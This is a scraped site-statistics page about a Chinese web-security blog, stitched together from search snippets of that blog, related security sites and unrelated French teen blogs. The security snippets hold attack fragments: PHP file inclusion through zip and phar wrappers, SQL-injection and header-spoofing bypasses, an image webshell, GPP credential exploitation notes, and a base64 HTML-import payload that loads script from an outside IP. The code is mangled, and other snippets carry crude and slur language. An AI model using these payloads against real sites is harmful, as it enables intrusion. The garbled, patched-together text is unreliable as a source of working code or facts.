bl4ck.in
Tomato's BL0G一直想成为渗透狗的web狗
http://www.bl4ck.in/
一直想成为渗透狗的web狗
http://www.bl4ck.in/
TODAY'S RATING
>1,000,000
Date Range
HIGHEST TRAFFIC ON
Wednesday
LOAD TIME
0.4 seconds
PAGES IN
THIS WEBSITE
7
SSL
EXTERNAL LINKS
21
SITE IP
133.130.52.207
LOAD TIME
0.406 sec
SCORE
6.2
Tomato's BL0G | bl4ck.in Reviews
https://bl4ck.in
一直想成为渗透狗的web狗
bl4ck.in
分类 tricks 下的文章 - Tomato's BL0G
http://bl4ck.in/index.php/category/tricks
Php $file = $ GET['file']; if(isset($file) & strtolower(substr($file, -4) = .jpg){ include($file); }? Php $file = $ GET['file']; include($file.'.jpg');? 但是 x00的截断在php 5.3.4就没用了,而且还要考虑GPC,所以是比较鸡肋的方法。 然后我们构造zip:/ php.zip#php.jpg. Http:/ 127.0.0.1/file.php? File=zip:/ php.zip%23php.jpg. Php $p = new PharData(dirname( FILE ).'/phartest2.zip', 0,'phartest2',Phar: ZIP) ; $x=file get contents('./php.php'); $p- addFromString('a.jpg', $x);? Http:/ 127.0.0.1/file.php? File=phar:/ php.zip/php.jpg.
分类 writeup 下的文章 - Tomato's BL0G
http://bl4ck.in/index.php/category/writeup
文件名','uid','uid'),( database() ,'uid','uid')#.jpg. 然后就可以登陆admin这个帐号,然后在manage页面提示 not allow ip 我们把xxf改为127.0.0.1就可以绕过。 然后要我们猜action 由于是filemanage就直接猜action upload 然后就出现一个上传页面,通过一轮fuzz,直接上传一个图片马,在后面写上. Script lanaguage=php phpinfo() /script. Link rel=import href=data:text/html;base64,PHNjcmlwdD5kZWxldGUgYWxlcnQ7YWxlcnQoIkhlbGxvIik7PC9zY3JpcHQ. Link rel=import href=data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzE4MC43Ni4xNzguNTQ6ODAwNC80Yjc5ZjVkNDg2MDM4NGQ0YWM0OTRhZDkxZjUzMTNiNy9qcy9qcXVlcnkuanM PC9zY3Jpc...
关于狗,我 - Tomato's BL0G
http://bl4ck.in/index.php/AboutMe.html
June 11th, 2015 at 12:11 am. June 11th, 2015 at 12:12 am. June 22nd, 2015 at 10:07 pm. July 23rd, 2015 at 02:39 pm. 实战 通过DNS协议绕过防火墙 - 莹莹之色. Via@ Tomato ][.]. 强迫症- - new ActiveXObject(versio.
windows2008 GPP漏洞利用 - Tomato's BL0G
http://bl4ck.in/index.php/penetration/windows2008-GPP-vulnerability.html
本文由 Tomato 发表于 2015 年 08 月 15 日. Windows7 普通域成员 windows2008 域控. Gpupdate & net user. Tomato-dc SYSVOL tomato.com Policies {31B2F340-016D-11D2-945F-00C04FB984F9} MACHINE Preferences Groups. Xml version=1.0 encoding=utf-8? Services Services.xml ScheduledTasks ScheduledTasks.xml Printers Printers.xml Drives Drives.xml DataSources DataSources.xml. July 30th, 2016 at 07:14 am. Via@ Tomato ][.]. 实战 通过DNS协议绕过防火墙 - 莹莹之色. Via@ Tomato ][.]. 强迫症- - new ActiveXObject(versio.
zip或phar协议包含文件 - Tomato's BL0G
http://bl4ck.in/index.php/tricks/use-zip-or-phar-to-include-file.html
本文由 Tomato 发表于 2015 年 06 月 10 日. Php $file = $ GET['file']; if(isset($file) & strtolower(substr($file, -4) = .jpg){ include($file); }? Php $file = $ GET['file']; include($file.'.jpg');? 但是 x00的截断在php 5.3.4就没用了,而且还要考虑GPC,所以是比较鸡肋的方法。 然后我们构造zip:/ php.zip#php.jpg. Http:/ 127.0.0.1/file.php? File=zip:/ php.zip%23php.jpg. Php $p = new PharData(dirname( FILE ).'/phartest2.zip', 0,'phartest2',Phar: ZIP) ; $x=file get contents('./php.php'); $p- addFromString('a.jpg', $x);? File=phar:/ php.zip/php.jpg.
TOTAL PAGES IN THIS WEBSITE
7
网络安全博客 NaviSec.it – 纳威安全导航 | 网络安全导航
http://www.navisec.it/main/index/20
网络安全人员的上网导航 – Ctrl D 收藏. 技术分享 HackerOne第三季度TOP 5 漏洞报告. 技术分享 从PouchDB到RCE: 一个node.js注入向量. Linux Shell 1 /dev/null 2 &am…. EndNote v7.7.1升级地址.
逆向路由器固件之SQL注入 | xd_xd's blog
http://xdxd.love/2016/09/20/逆向路由器固件之SQL注入
發表於 Sep 20 2016. Rootfs git:(master) find . -name my cgi .cgi. Usr/bin/my cgi .cgi. Rootfs git:(master) file ./usr/bin/my cgi .cgi. Usr/bin/my cgi .cgi. Bit LSB executable, MIPS, MIPS-II version 1. SYSV), dynamically linked (uses shared libs), stripped. 查询 select level from user where user name 字符串,可以定位到do login函数。 Or level = ( select.
一个简单的mips架构缓冲区溢出分析 | xd_xd's blog
http://xdxd.love/2016/11/19/一个简单的mips架构缓冲区溢出分析
發表於 Nov 19 2016. NPlease input your Password: ". Welcome to the new world n". Bin/mipsel-linux-gcc secret.c -o secret - static. Signal 11 (Segmentation fault) - core dumped Segmentation fault. 0x88 var 4( $sp. 0x88 var 8( $sp. 0x88 var 78( $sp. 0x47 # ' G. APleaseInputYou - 0x470000) # " nPlease input your Password: ". Printf nop lw $gp. 0x88 var 78( $fp. 0x47 # ' G. AS 2 - 0x470000) # "%s". 0x88 var 70 move. Isoc99 scanf nop lw $gp. 0x88 var 78( $fp. 0x88 var 70 move. 0x88 var 4( $sp. 0x88 var 8( $sp.
小脚本之监控论坛帖子更新并发送邮件通知 | xd_xd's blog
http://xdxd.love/2016/09/26/小脚本之监控论坛帖子更新并发送邮件通知
發表於 Sep 26 2016. Url = 'http:/ www.test.net/forum.php? Headers = { 'user-agent'. Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36'. R = requests.get(url, headers=headers) soup = BeautifulSoup(r.text) newest = soup.find( 'span'. While True: try: thenexttitle = getnewesttitle. Print newesttitle. encode. Print thenexttitle. encode. Newesttitle: newesttitle = thenexttitle send mail. Pass except RuntimeError: print.
网络安全博客 NaviSec.it – 纳威安全导航 | 网络安全导航
http://www.md5.navisec.it/main/index
网络安全人员的上网导航 – Ctrl D 收藏. 技术分享 0patch另一个0day IE 11类型混淆漏洞 CVE…. 技术分享 Java RMI 反序列化漏洞检测与分析 含测试工具. Linux sys call table变动检测 - .Little …. Fiyo CMS 2.0.6.1 权限提升漏洞. 技术分享 探索基于Windows 10的Windows内核Shell…. Neural network for Malware Classifi…. Reverse Engineering Samsung S6 SBOO….
网络安全博客 NaviSec.it – 纳威安全导航 | 网络安全导航
http://www.md5.navisec.it/main/index/20
网络安全人员的上网导航 – Ctrl D 收藏. 技术分享 看我如何挖到GoogleMaps XSS漏洞并获得5000…. 技术分享 CVE-2016-5483 利用mysqldump备份可生…. Ubuntu Debian Kali 部署 巡风. NativePayload DNS 通过DNS传输的后门Payload….
TOTAL LINKS TO THIS WEBSITE
21
Blog de Bl4Ck-Xss - hwww =) - Skyrock.com
Mot de passe :. J'ai oublié mon mot de passe. Mise à jour :. Ame Caleen - Le Fruit Défendu. Abonne-toi à mon blog! N'oublie pas que les propos injurieux, racistes, etc. sont interdits par les conditions générales d'utilisation de Skyrock et que tu peux être identifié par ton adresse internet (67.219.144.170) si quelqu'un porte plainte. Ou poster avec :. Retape dans le champ ci-dessous la suite de chiffres et de lettres qui apparaissent dans le cadre ci-contre. Posté le jeudi 04 mars 2010 11:58.
Blog de Bl4ck-Ymls-White - TchoA ! 【ツ】 - Skyrock.com
Mot de passe :. J'ai oublié mon mot de passe. 12304;ツ】. 12304;ツ】. P'tite Meuf Des Iles XD. That's Cool ;) isn't it? 12304;ツ】. Mise à jour :. JVDK- Stop à ton systeme. Abonne-toi à mon blog! P'tite Métisse Des Iles. Vacances trop Pur à Maré. Nic toutes les Putes et les Putains . Ou poster avec :. Retape dans le champ ci-dessous la suite de chiffres et de lettres qui apparaissent dans le cadre ci-contre. Posté le lundi 16 février 2009 04:10. Modifié le dimanche 24 mai 2009 04:06. 9633;■□. Ou poster avec :.
Black Pearl Corporation Presents Hacker HOWTO
Http:/ bl4ck.ovh.org/. DZIAL DOWNLOAD. POLECAM!
bL4cK.de
Half life duel and TDM. InCounterStrike.de: editor in chief. Pro-lamer.de: head admin. IGL - Incite Gaming League. DeCL (ESL) - Deutsche ClanLiga. GSL - Gamestar League. Some other ladders, several cups and LANs. Birthday: 16.01.1984. Occupation: student (economics), independent. Config ( v. 1.6). Cpl cs gui (last version). 25 Fragen an. bL4cK. Time to say goodbye. Thanks for all these predominent positive memories.
Index of /
Tomato's BL0G
Windows7 普通域成员 windows2008 域控. Gpupdate & net user. Tomato-dc SYSVOL tomato.com Policies {31B2F340-016D-11D2-945F-00C04FB984F9} MACHINE Preferences Groups. Xml version=1.0 encoding=utf-8? Services Services.xml ScheduledTasks ScheduledTasks.xml Printers Printers.xml Drives Drives.xml DataSources DataSources.xml. Where is the key? 然后base64 decode之后,为emem. /ctf 360 flag 后面群里提示苹果电脑,然后访问. Http:/ isg.campus.360.cn/web1/ctf 360 flag/.DS Store. Http:/ isg.campus.360.cn/web2/check.php.swp. Exit; } else if(! Is nu...
Blog de Bl4cK - tt un tas de conneries!!!! normal chui jeune !!! jeune et con !!!!! - Skyrock.com
Mot de passe :. J'ai oublié mon mot de passe. Tt un tas de conneries! Mes idées, mes musiques, mes montages, mes tresors.bref une petite partie dévoilé de BLACK. Mise à jour :. Abonne-toi à mon blog! Ouais bon j'ai pas fait d'article depuis au moins plus de 2 ans et j'en ai rien a foutre , jai regardé vite fait les article histoire de me rapellé comment j'étais.tout ces articles.l'étendu des dégats est assez titanesque.putain j'étais vraiment une putain de kikoolol, j'en ai limite honte. Ou poster avec :.
Blog de Bl4cK05T - my wOrld nigga!!!! - Skyrock.com
Mot de passe :. J'ai oublié mon mot de passe. Vous expliquer mon Bonheur and rien d'autre =P. Mise à jour :. Right Round (R.O.O.T.S). Abonne-toi à mon blog! N'oublie pas que les propos injurieux, racistes, etc. sont interdits par les conditions générales d'utilisation de Skyrock et que tu peux être identifié par ton adresse internet (67.219.144.114) si quelqu'un porte plainte. Ou poster avec :. Retape dans le champ ci-dessous la suite de chiffres et de lettres qui apparaissent dans le cadre ci-contre.
Blog de Bl4ck0s - M4xiim3/Bl4ck0s` - Skyrock.com
Mot de passe :. J'ai oublié mon mot de passe. Justine la lapine je t'aime pqt mon coeur! Kévin des bars o bowling ac toi! Je peu touché ton nombrille? C un batar il a pri notre banc! Sonia je t'aime plv ma besta corectioneuse (l). J'en é ma clake hein! Corentin savé compté 2 par 2 é lacé c chosur! Maité ta dla chance detre a coté de boulet =O! Poline jmen fou jvé te prendre par deriere! Lora alias polux ou encore chamboultou ou sale carle. Camille tu gere ma ptite femme! A merde c moi ki te la tien!
bl4ck0ut (Kenny) - DeviantArt
Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')" class="mi". Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')". Join DeviantArt for FREE. Forgot Password or Username? Deviant for 10 Years. This deviant's full pageview. Last Visit: 15 weeks ago. This is the place where you can personalize your profile!
